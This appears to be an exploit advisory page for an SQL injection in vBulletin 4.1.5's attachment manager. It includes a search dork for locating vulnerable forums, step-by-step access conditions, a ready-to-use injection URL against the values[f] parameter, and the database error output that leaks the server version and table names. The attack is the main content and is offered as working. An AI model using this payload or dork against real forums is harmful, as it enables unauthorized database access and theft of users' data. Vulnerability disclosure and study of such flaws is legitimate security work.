vbulletin 4.1.5 attachment SQLI

2013.03.22
Credit: Anonymous
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

vbulletin 4.1.5 attachment SQLI examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values &#8203;&#8203;[f]" insert our SQL query. Example: Code: http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1 After that, we see the standard error of the database offline, thus opening the source code of the page and see: Code: <! - Database error in vBulletin 4.1.5 : Invalid SQL : SELECT permissionsfrom , Hidden , setpublish , publishdate , userid FROM ds23fSDdfsdf_cms_node WHERE nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a ); MySQL Error : Duplicate column Name .1.49-3 '5 ' Error Number : 1060 Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 Address : 127.0.0.1 Username : Hacker Classname : vB_Database MySQL Version : ->

References:

http://pastebin.com/5hgWHFbj


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top